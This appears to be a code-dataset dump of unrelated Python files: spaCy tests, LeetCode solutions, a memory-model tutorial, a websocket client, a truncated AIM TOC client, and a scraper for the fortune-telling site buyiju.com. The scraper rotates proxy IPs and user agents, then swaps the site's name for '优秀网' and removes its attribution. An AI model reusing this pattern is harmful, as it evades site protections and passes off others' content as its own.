172fd6a6f6a7e501a7de91d45c12f74794c95b5f | 9afbb6993450d1e0c3bae68e86844bd06d4419ee | /gui/help1.py | e002f49a08124bc75ba58494211b2b47d2e5ac89 | [] | no_license | Jigar710/Python_Programs | 6f331caac30878655d4cca4ad97d4214c0262088 | 714a6306487eb6712f32ccb51b6a2407a81873fa | refs/heads/main | 2023-02-25T12:24:44.874199 | 2021-01-28T15:43:24 | 2021-01-28T15:43:24 | 332,869,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | import tkinter
help(tkinter) | [
"jigar.shekhat.777@gmail.com"
] | jigar.shekhat.777@gmail.com |
905af0071c737e9ee131d302fd623eb668532ec3 | ef3a7391b0a5c5d8e276355e97cbe4de621d500c | /venv/Lib/site-packages/spacy/tests/lang/en/test_text.py | a7ebde9898add7b47514cf89f800b00e9f28a74b | [
"Apache-2.0"
] | permissive | countBMB/BenjiRepo | 143f6da5d198ea6f06404b4559e1f4528b71b3eb | 79d882263baaf2a11654ca67d2e5593074d36dfa | refs/heads/master | 2022-12-11T07:37:04.807143 | 2019-12-25T11:26:29 | 2019-12-25T11:26:29 | 230,090,428 | 1 | 1 | Apache-2.0 | 2022-12-08T03:21:09 | 2019-12-25T11:05:59 | Python | UTF-8 | Python | false | false | 1,898 | py | # coding: utf-8
from __future__ import unicode_literals
import pytest
from spacy.lang.en.lex_attrs import like_num
def test_en_tokenizer_handles_long_text(en_tokenizer):
text = """Tributes pour in for late British Labour Party leader
Tributes poured in from around the world Thursday
to the late Labour Party leader John Smith, who died earlier from a massive
heart attack aged 55.
In Washington, the US State Department issued a statement regretting "the
untimely death" of the rapier-tongued Scottish barrister and parliamentarian.
"Mr. Smith, throughout his distinguished"""
tokens = en_tokenizer(text)
assert len(tokens) == 76
@pytest.mark.parametrize(
"text,length",
[
("The U.S. Army likes Shock and Awe.", 8),
("U.N. regulations are not a part of their concern.", 10),
("“Isn't it?”", 6),
("""Yes! "I'd rather have a walk", Ms. Comble sighed. """, 15),
("""'Me too!', Mr. P. Delaware cried. """, 11),
("They ran about 10km.", 6),
pytest.param(
"But then the 6,000-year ice age came...", 10, marks=pytest.mark.xfail()
),
],
)
def test_en_tokenizer_handles_cnts(en_tokenizer, text, length):
tokens = en_tokenizer(text)
assert len(tokens) == length
@pytest.mark.parametrize(
"text,match",
[
("10", True),
("1", True),
("10,000", True),
("10,00", True),
("999.0", True),
("one", True),
("two", True),
("billion", True),
("dog", False),
(",", False),
("1/2", True),
],
)
def test_lex_attrs_like_number(en_tokenizer, text, match):
tokens = en_tokenizer(text)
assert len(tokens) == 1
assert tokens[0].like_num == match
@pytest.mark.parametrize("word", ["eleven"])
def test_en_lex_attrs_capitals(word):
assert like_num(word)
assert like_num(word.upper())
| [
"bengmen92@gmail.com"
] | bengmen92@gmail.com |
834f1bf7004dbffd444b639a44a6dd308b70ec95 | 796b8a166edc28dd04d23244b698742a607bc23f | /Leetcode/140. Word Break II.py | f899b9fa0812e2d472653987c6dc2e7d94fa7583 | [] | no_license | brlala/Educative-Grokking-Coding-Exercise | 54f18309d89784fbf9452b5b609cd30e54378c46 | e50dc0642f087f37ab3234390be3d8a0ed48fe62 | refs/heads/master | 2023-04-22T07:34:37.360508 | 2021-05-02T11:16:47 | 2021-05-02T11:16:47 | 299,006,488 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | class Solution:
def wordBreak(self, s: str, wordDict: list[str]) -> list[str]:
"""
https://leetcode.com/problems/word-break-ii/discuss/44368/Python-easy-to-understand-solutions-(memorization%2BDFS-DP%2BDFS)
"""
memo = {}
return self.dfs(s, set(wordDict), memo)
def dfs(self, s, wordDict, memo):
if s in memo:
return memo[s]
if not s:
return [""]
res = []
for i in range(1, len(s) + 1):
if s[:i] in wordDict:
for word in self.dfs(s[i:], wordDict, memo):
res.append(s[:i] + (" " if word else "") + word)
memo[s] = res
return res
a = Solution()
a.wordBreak(s="catsanddog", wordDict=["cat", "cats", "and", "sand", "dog"])
| [
"liheng@pand.ai"
] | liheng@pand.ai |
e2c433cdf668923a5392e033234ce436dff666cc | 5c05a9a520ddd07f92759fe4220ddec5ffe01ab2 | /python网络数据采集/my_爬虫_进阶_之路/scrapy框架/my_spiders/电商项目集合/my_flask_server/buyiju_spider.py | 67cb1e2fe1f41bb1b263d3bde71ec90ed078215e | [] | no_license | sdpku/python | c005970827377615b3f9f1ec2bfb752972bc5e99 | 0363316911aa2ed89e5499b5a6dd2928867ee3bd | refs/heads/master | 2020-06-26T06:57:44.171835 | 2019-07-29T09:27:17 | 2019-07-29T09:27:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,536 | py | # coding:utf-8
'''
@author = super_fazai
@File : buyiju_spider.py
@connect : superonesfazai@gmail.com
'''
"""
卜易居 spider(https://m.buyiju.com)
"""
from settings import (
MY_SPIDER_LOGS_PATH,
IP_POOL_TYPE,)
from article_spider import (
modify_body_p_typesetting,
modify_body_img_centering,)
from fzutils.spider.selector import async_parse_field
from fzutils.exceptions import catch_exceptions_with_class_logger
from fzutils.spider.async_always import *
class BuYiJuSpider(AsyncCrawler):
def __init__(self, logger=None):
AsyncCrawler.__init__(
self,
ip_pool_type=IP_POOL_TYPE,
log_print=True,
logger=logger,
log_save_path=MY_SPIDER_LOGS_PATH + '/buyiju/_/',)
self.num_retries = 6
self.parser_obj_dict = self.get_parser_obj_dict()
async def _fck_run(self):
"""
main
:return:
"""
# self.test()
# ** 姓名打分
res = await self.name_scoring(
surname='吕',
name='布',)
# ** 测字算命
# res = await self.word_and_fortune_telling(two_words='你好')
# ** 生日算命
# res = await self.birthday_fortune_telling(month=12, day=25)
# ** 手机号码测吉凶
# res = await self.phone_number_for_good_or_bad_luck(phone_num=18796571279)
# ** 车牌号码测吉凶
# res = await self.license_plate_num_for_good_or_bad(
# province='京',
# city_num='A',
# num='66666')
# ** 姓名缘分配对
# res = await self.distribution_pairs_of_names(
# name1='吕布',
# name2='貂蝉')
# ** 星座配对
# res = await self.constellation_pairing(
# name1='处女座',
# name2='摩羯座')
# ** 抽签算命
# 财神灵签
# res = await self.fortune_telling_by_lot(lot_type='cs')
# 观音灵签
# res = await self.fortune_telling_by_lot(lot_type='gy')
# 佛祖灵签
# res = await self.fortune_telling_by_lot(lot_type='fz')
# 月老灵签
# res = await self.fortune_telling_by_lot(lot_type='yl')
# 关帝灵签
# res = await self.fortune_telling_by_lot(lot_type='gd')
# 黄大仙灵签
# res = await self.fortune_telling_by_lot(lot_type='hdx')
# 吕祖灵签
# res = await self.fortune_telling_by_lot(lot_type='lz')
# 天后妈祖灵签
# res = await self.fortune_telling_by_lot(lot_type='mz')
# 地藏王灵签
# res = await self.fortune_telling_by_lot(lot_type='dzw')
# 易经64卦灵签
# res = await self.fortune_telling_by_lot(lot_type='yj')
# 太上老君灵签
# res = await self.fortune_telling_by_lot(lot_type='tslj')
# pprint(res)
async def constellation_pairing(self, name1: str, name2: str) -> dict:
"""
星座配对
:param name1:
:param name2:
:return:
"""
assert name1 != '' and name2 != '', 'name1 or name2其一为空值'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/peidui/xzpd.php',
})
data = {
'xz1': name1,
'xz2': name2,
'submit': '开始测试',
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/peidui/xzpd.php',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['constellation_pairing']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_constellation_pairing_content(content=content)
print(content)
return {
'res': content,
}
async def distribution_pairs_of_names(self, name1: str, name2: str) -> dict:
"""
姓名缘分配对
:param name1:
:param name2:
:return:
"""
assert name1 != '' and name2 != '', \
'name1 or name2其一为空值'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/peidui/xmyf.php',
})
data = {
'cname1': name1,
'cname2': name2,
'submit': '开始测试',
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/peidui/xmyf.php',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['distribution_pairs_of_names']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_distribution_pairs_of_names_content(content=content)
print(content)
return {
'res': content,
}
async def license_plate_num_for_good_or_bad(self, province: str, city_num: str, num :str):
"""
车牌测吉凶
:param province:
:param city_num:
:param num:
:return:
"""
assert province != '' and city_num != '' and num != '',\
'province or city_num or num 其一为空值'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/cm/chepai/',
})
data = {
'sheng': province,
'shi': city_num,
'czsm': num,
'action': 'test'
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/cm/chepai/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['license_plate_num_for_good_or_bad']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_license_plate_num_for_good_or_bad_content(content=content)
print(content)
return {
'res': content,
}
async def phone_number_for_good_or_bad_luck(self, phone_num: int):
"""
手机号码测吉凶
:param phone_num:
:return:
"""
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/shouji/',
})
data = {
'sjhao': str(phone_num),
'action': 'test'
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/shouji/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['phone_number_for_good_or_bad_luck']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_phone_number_for_good_or_bad_luck_content(content=content)
print(content)
return {
'res': content,
}
async def birthday_fortune_telling(self, month: int, day: int) -> dict:
"""
生日算命
:return:
"""
headers = await self.get_random_phone_headers()
headers.update({
'Referer': 'https://m.buyiju.com/birth/shu/',
})
body = await unblock_request(
url='https://m.buyiju.com/birth/shu/{month}-{day}.html'.format(month=month, day=day),
headers=headers,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['birthday_fortune_telling']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_birthday_fortune_telling_content(content=content)
print(content)
return {
'res': content,
}
async def get_lot_some_params(self, lot_type: str) -> tuple:
"""
得到抽签动态参数
:param lot_type:
:return:
"""
assert lot_type != '', 'lot_type != ""'
base_referer = 'https://m.buyiju.com/{}/'
base_url = 'https://m.buyiju.com/{}/'
base_referer2 = 'https://m.buyiju.com/chouqian/{}/'
base_url2 = 'https://m.buyiju.com/chouqian/{}/'
if lot_type == 'gy':
# 观音灵签, 共100签
referer = base_referer.format('guanyin')
qid = str(get_random_int_number(1, 100))
url = base_url.format('guanyin')
elif lot_type == 'fz':
# 佛祖灵签, 共51签
referer = base_referer2.format('fozu')
qid = str(get_random_int_number(1, 51))
url = base_url2.format('fozu')
elif lot_type == 'yl':
# 月老灵签, 共101签
referer = base_referer.format('yuelao')
qid = str(get_random_int_number(1, 101))
url = base_url.format('yuelao')
elif lot_type == 'gd':
# 关帝灵签, 共100签
referer = base_referer.format('guandi')
qid = str(get_random_int_number(1, 100))
url = base_url.format('guandi')
elif lot_type == 'hdx':
# 黄大仙灵签, 共100签
referer = base_referer.format('hdx')
qid = str(get_random_int_number(1, 100))
url = base_url.format('hdx')
elif lot_type == 'lz':
# 吕祖灵签, 共100签
referer = base_referer.format('lvzu')
qid = str(get_random_int_number(1, 100))
url = base_url.format('lvzu')
elif lot_type == 'mz':
# 天后妈祖灵签, 共101签
referer = base_referer2.format('mazu')
qid = str(get_random_int_number(1, 101))
url = base_url2.format('mazu')
elif lot_type == 'cs':
# 财神灵签, 共61签
referer = base_referer2.format('caishen')
qid = str(get_random_int_number(1, 61))
url = base_url2.format('caishen')
elif lot_type == 'dzw':
# 地藏王灵签, 共60签
referer = base_referer2.format('dizangwang')
qid = str(get_random_int_number(1, 60))
url = base_url2.format('dizangwang')
elif lot_type == 'yj':
# 易经64卦灵签, 共64签
referer = base_referer2.format('yijing')
qid = str(get_random_int_number(1, 64))
url = base_url2.format('yijing')
elif lot_type == 'tslj':
# 太上老君灵签, 共28签
referer = base_referer2.format('taishanglaojun')
qid = str(get_random_int_number(1, 28))
url = base_url2.format('taishanglaojun')
else:
raise NotImplemented('lot_type value异常!')
return referer, qid, url
async def fortune_telling_by_lot(self, lot_type: str) -> dict:
"""
根据抽签类别进行抽签
:param lot_type:
:return:
"""
assert lot_type != '', 'lot_type != ""'
referer, qid, url = await self.get_lot_some_params(lot_type=lot_type)
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': referer,
})
data = {
'qian': 'ok',
'qid': qid,
}
body = await unblock_request(
method='post',
url=url,
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg, )
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['fortune_telling_by_lot']['content'],
target_obj=body,
logger=self.lg, )
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_fortune_telling_by_lot_content(content=content)
print(content)
return {
'res': content,
}
async def word_and_fortune_telling(self, two_words: str) -> dict:
"""
测字算命
:param two_words: 2字
:return:
"""
assert two_words != '', 'two_words != ""'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/cm/cezi/',
})
data = {
'czsm': two_words,
'action': 'test',
}
body = await unblock_request(
url='https://m.buyiju.com/cm/cezi/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['word_and_fortune_telling']['content'],
target_obj=body,
logger=self.lg,)
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_word_and_fortune_telling_content(content=content)
print(content)
return {
'res': content,
}
async def name_scoring(self, surname: str, name: str) -> dict:
"""
姓名打分
:param surname: 姓
:param name: 名字
:return:
"""
assert surname != '' and name != '', \
'surname or name 为空值!'
headers = await self.get_random_phone_headers()
headers.update({
'Origin': 'https://m.buyiju.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://m.buyiju.com/cm/',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
})
data = {
'xs': surname,
'mz': name,
'action': 'test'
}
body = await unblock_request(
method='post',
url='https://m.buyiju.com/cm/',
headers=headers,
data=data,
ip_pool_type=self.ip_pool_type,
num_retries=self.num_retries,
logger=self.lg,)
# self.lg.info(body)
try:
assert body != ''
content = await async_parse_field(
parser=self.parser_obj_dict['byj']['name_scoring']['content'],
target_obj=body,
logger=self.lg,)
assert content != '', 'content != ""'
except Exception:
self.lg.error('遇到错误:', exc_info=True)
return {}
content = await self._wash_name_scoring_content(content=content)
print(content)
return {
'res': content,
}
@staticmethod
async def _wash_constellation_pairing_content(content) -> str:
"""
清洗星座配对
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>'),
],
add_sensitive_str_list=None,
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_distribution_pairs_of_names_content(content) -> str:
"""
姓名缘分测试
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>'),
],
add_sensitive_str_list=[
'<small>www.buyiju.com/peidui/xmyf.php</small>'
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_license_plate_num_for_good_or_bad_content(content) -> str:
"""
清洗车牌测吉凶
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<p><strong>优秀网车牌祥批</strong></p>',
'<p>以上结果为通用数理分析,如需全面掌握车牌号 <span class=\"red\">.*?</span> 带给你的机缘,可请优秀网结合 <strong>生辰八字</strong>进行测算,让你全面掌握车牌号带给你的机缘!可以为选车牌号提供参考。</p>'
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
if content != '':
# 牌照底纹蓝色
content = '<style>.cp{width:180px;margin:auto;} .cp ul{color:white;font-weight:bold;letter-spacing:2px;background-color:blue;padding:2px;} .cp ul li{border:2px solid #fff;text-transform:uppercase;font:normal normal 26px/30px Arial, Helvetica, sans-serif;list-style-type: none;padding-top:2px;} .zmdx{text-transform:uppercase;}</style>' + \
content
else:
pass
return content
@staticmethod
async def _wash_phone_number_for_good_or_bad_luck_content(content) -> str:
"""
清洗手机号码测吉凶
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<p><strong>优秀网手机号吉凶祥批</strong></p>',
'<p>以上结果为通用数理分析,如需全面掌握手机号码 <span class=\"red\">\d+</span> 带给您的机缘,可请优秀网结合您的 <strong>生辰八字</strong> 进行测算,可以为选手机号提供参考。</p>'
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_birthday_fortune_telling_content(content) -> str:
"""
清洗生日算命
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<a href=\"/sm/cx.php\">点此进行精确的星座查询</a>',
'如果您的生日刚好处于起止点日期前后,您可能需要进行精确的星座查询,。',
],
is_default_filter=False,
is_lower=False,)
return content
@staticmethod
async def _wash_fortune_telling_by_lot_content(content) -> str:
"""
清洗抽签算命
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>')
],
add_sensitive_str_list=[
'<p><strong>大师解签</strong></p>',
'<p>以上解签为通用解释,如需知晓具体事宜,可请大师结合您的生辰八字解签:</p>',
],
is_default_filter=False,
is_lower=False,)
return content
@staticmethod
async def _wash_word_and_fortune_telling_content(content) -> str:
"""
清洗测字算命
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
# 避免过度清洗
('<div class=\"yunshi\">.*</div>', '</div>')
],
is_default_filter=False,
is_lower=False,)
content = modify_body_p_typesetting(content=content)
return content
@staticmethod
async def _wash_name_scoring_content(content) -> str:
"""
清洗姓名打分
:param content:
:return:
"""
content = wash_sensitive_info(
data=content,
replace_str_list=[
('卜易居士|卜易居', '优秀网'),
('<div class=\"inform\">.*</div>', '</div>'),
('<table>', '<table border=\"1\" width=\"100%\" bgcolor=\"white\" cellpadding=\"2\">')
],
add_sensitive_str_list=[
# 笔画不准, 过滤掉
'<tr><td>笔划:.*?</td></tr>',
'<p><strong>八字姓名详批</strong></p>',
'<p>优秀网独家研发的姓名学祥批,打破五行笔划测吉凶的限制,为您正确揭示姓名 <span class=\"red\">.*?</span> 的吉凶能量,并针对你的姓名提供专属的开运方法,让你全面掌握姓名的权威解读!起名必看!</p>',
],
is_default_filter=False,
is_lower=False,)
if content != '':
content = '<link href="//i.buyiju.com/css/mobile.css?v0616" rel="stylesheet" media="screen" type="text/css" />' \
+ content
else:
pass
return content
@catch_exceptions_with_class_logger(default_res='aa')
def test(self) -> str:
a = 'test test'
b, c, d = a.split()
return ''
@staticmethod
def get_parser_obj_dict() -> dict:
return {
'byj': {
'name_scoring': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'word_and_fortune_telling': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'fortune_telling_by_lot': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'birthday_fortune_telling': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'phone_number_for_good_or_bad_luck': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'license_plate_num_for_good_or_bad': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'distribution_pairs_of_names': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
'constellation_pairing': {
'content': {
'method': 'css',
'selector': 'div.content',
},
},
},
}
@staticmethod
async def get_random_phone_headers() -> dict:
return {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': get_random_phone_ua(),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
}
def __del__(self):
try:
del self.loop
except:
pass
collect()
if __name__ == '__main__':
byj_spider = BuYiJuSpider()
loop = get_event_loop()
loop.run_until_complete(byj_spider._fck_run()) | [
"superonesfazai@gmail.com"
] | superonesfazai@gmail.com |
a9d4ac0dc4600aad5c813e4f10bbfc32474689da | 5c099927aedc6fdbc515f40ff543c65b3bf4ec67 | /algorithms/reach-a-number/src/Solution.py | d0db1844032445cbf8a4d7b18d9dca9e6ff0fe52 | [] | no_license | bingzhong-project/leetcode | 7a99cb6af1adfbd9bb1996a7f66a65679053c478 | ba82e7d94840b3fec272e4c5f82e3a2cfe4b0505 | refs/heads/master | 2020-04-15T09:27:33.979519 | 2020-03-10T03:43:07 | 2020-03-10T03:43:07 | 164,550,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | class Solution:
def reachNumber(self, target: int) -> int:
target = abs(target)
res = 0
sum = 0
while sum < target or (sum - target) % 2 == 1:
res += 1
sum += res
return res
| [
"zhongyongbin@foxmail.com"
] | zhongyongbin@foxmail.com |
149ae6b89e08984c8892fd21814a9ce971fb68fc | cad9c13ad5864317d7687b44f39db42a402f36f0 | /lec03_function/memory_model.py | e0d53d8b99bd2f5313bda8b0570513bc336febf0 | [] | no_license | handaeho/lab_python | 12b686eb0d57358509f2d0cd607064deced5b25d | da068ea62682ffa70c7d23dde4ef132c49a81364 | refs/heads/master | 2020-11-26T08:22:27.656109 | 2020-04-13T02:28:47 | 2020-04-13T02:28:47 | 229,013,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | """
파이썬 메모리 모델 - 파이썬이 변수들의 메모리 공간을 관리하는 방법.
"""
n1 = 1
print(f'주소 : {id(n1)}, 저장된 값 : {n1}') # 주소 : 140719357063440, 저장된 값 : 1
n2 = n1
print(f'주소 = {id(n2)}, 저장된 값 = {n2}') # 주소 = 140719357063440, 저장된 값 = 1
n2 = 2
print(f'주소 = {id(n2)}, 저장된 값 = {n2}') # 주소 = 140719357063472, 저장된 값 = 2
n3 = 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}') # 주소 = 140719357063440, 저장된 값 = 1
n3 = 3 - 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}') # 주소 = 140719357063472, 저장된 값 = 2
s1 = 'abc'
s2 = 'abc'
print(f'주소 = {id(s1)}, 저장된 값 = {s1}') # 주소 = 2376176854256, 저장된 값 = abc
print(f'주소 = {id(s2)}, 저장된 값 = {s2}') # 주소 = 2376176854256, 저장된 값 = abc
# 저장된 값이 같은 것들은 주소가 서로 같음. => 숫자 / 문자열인 경우, 생성된 객체를 캐싱(재활용)
# 숫자 / 문자열이 아닌 객체는, 값이 같아도 주소가 다름.(캐싱 X. 주소가 새롭게 생성됨)
list1 = [1, 2, 3]
list2 = [1, 2, 3]
print(f'주소 = {id(list1)}, 저장된 값 = {list1}') # 주소 = 2290452484680, 저장된 값 = [1, 2, 3]
print(f'주소 = {id(list2)}, 저장된 값 = {list2}') # 주소 = 2290452485192, 저장된 값 = [1, 2, 3]
list3 = list2
print(f'주소 = {id(list3)}, 저장된 값 = {list3}') # list2를 참조 했기 때문에 list2와 list3의 주소는 같음.
list2[0] = 100
print(list2, list3) # [100, 2, 3] [100, 2, 3]
# list2를 변경했더니, list3까지도 같이 변경되었다. ~~~> list2와 list3의 주소가 서로 같기 때문.
list3[1] = 200
print(list2, list3) # [100, 200, 3] [100, 200, 3]
# 마찬가지로, list3을 변경하면 list2도 같이 변경된다.
# 정리하자면 list1과 list2는 다른 객체(주소가 다름), list2와 list3은 같은 객체.(주소가 같음)
# '==' 연산자 VS 'is' 연산자
a = [1, 2, 3]
b = [1, 2, 3]
print(f'== : {a == b}, is : {a is b}') # == : True, is : False
# '==' ~~~~~> 서로 '값'이 같은가? / 'is' ~~~~~> 서로 '주소'가 같은가?
| [
"mrdh94@naver.com"
] | mrdh94@naver.com |
dd9bf12890563e9f4e394367ee17592436c4db4e | c2210b7012d2cd608ba1c350169107fe79584568 | /helmet_seatbelt/src/python3/websocket-test0.py | 05cf8c319d37e16fb10b6e2696f67f4e190b8d93 | [] | no_license | ISCAS007/demo | 9165eb2765f35a93abf790977358b55a39cb5d7d | 92addff2e4a09f58ac405b9ce155f79604ac8169 | refs/heads/master | 2023-05-09T18:14:38.153027 | 2019-12-03T03:22:38 | 2019-12-03T03:22:38 | 375,907,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | #!/usr/bin/env python3
import asyncio
import websockets
import sys
@asyncio.coroutine
def hello():
websocket = yield from websockets.connect('ws://t.qdrise.com.cn:1234/')
try:
name=sys.argv[1]
yield from websocket.send(name)
print("> {}".format(name))
greeting = yield from websocket.recv()
print("< {}".format(greeting))
finally:
yield from websocket.close()
asyncio.get_event_loop().run_until_complete(hello())
| [
"youdaoyzbx@163.com"
] | youdaoyzbx@163.com |
2450876daff5dc84c0f6342726ad96dfe41cf71b | b1bc2e54f8cd35c9abb6fc4adb35b386c12fe6b4 | /toontown/src/testenv/toc.py | 1f7ec6b068f1921a13817e828cb530ce4eb4d2ec | [] | no_license | satire6/Anesidora | da3a44e2a49b85252b87b612b435fb4970469583 | 0e7bfc1fe29fd595df0b982e40f94c30befb1ec7 | refs/heads/master | 2022-12-16T20:05:13.167119 | 2020-09-11T16:58:04 | 2020-09-11T17:02:06 | 294,751,966 | 89 | 32 | null | null | null | null | UTF-8 | Python | false | false | 15,417 | py | ############################################
# Py-TOC 2.4
#
# Jamie Turner <jamwt@jamwt.com>
#
_VERSION = "2.4"
import socket
# import select
import re
import struct
import random
import sys
import time
import thread
import threading
TOC_SERV_AUTH = ("login.oscar.aol.com", 5159 )
TOC_SERV = ( "toc.oscar.aol.com", 9898 )
class TOCError(Exception):
pass
class TOCDisconnectError(Exception):
pass
class TocTalk:
def __init__(self,nick,passwd):
self._nick = nick
self._passwd = passwd
self._agent = "PY-TOC"
self._info = "I'm running the Python TOC Module by Jamie Turner <jamwt@jamwt.com>"
self._seq = random.randint(0,65535)
self._logfd = sys.stdout
self._debug = 1
self._running = 0
self._ignore = 0
self._tsem = threading.Semaphore()
self.build_funcs()
def build_funcs(self):
self._dir = []
for item in dir(self.__class__):
if ( type( eval("self.%s" % item)) == type(self.__init__) and
item[:3] == "on_" ):
self._dir.append(item)
def go(self):
self.connect()
self._running = 1
self.process_loop()
def start(self):
pass
def connect(self):
#create the socket object
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except:
raise TOCError, "FATAL: Couldn't create a socket"
# make the connection
try:
self._socket.connect( TOC_SERV )
except:
raise TOCDisconnectError, "FATAL: Could not connect to TOC Server"
buf = "FLAPON\r\n\r\n"
bsent = self._socket.send(buf)
if bsent <> len(buf):
raise TOCError, "FATAL: Couldn't send FLAPON!"
def start_log_in(self):
ep = self.pwdenc()
self._normnick = self.normalize(self._nick)
msg = struct.pack("!HHHH",0,1,1,len(self._normnick)) + self._normnick
self.flap_to_toc(1,msg)
#now, login
self.flap_to_toc(2,"toc_signon %s %s %s %s english %s" % (
TOC_SERV_AUTH[0],TOC_SERV_AUTH[1],self._normnick,ep,self.encode(self._agent) ) )
def normalize(self,data):
return re.sub("[^A-Za-z0-9]","",data).lower()
def encode(self,data):
for letter in "\\(){}[]$\"":
data = data.replace(letter,"\\%s"%letter)
return '"' + data + '"'
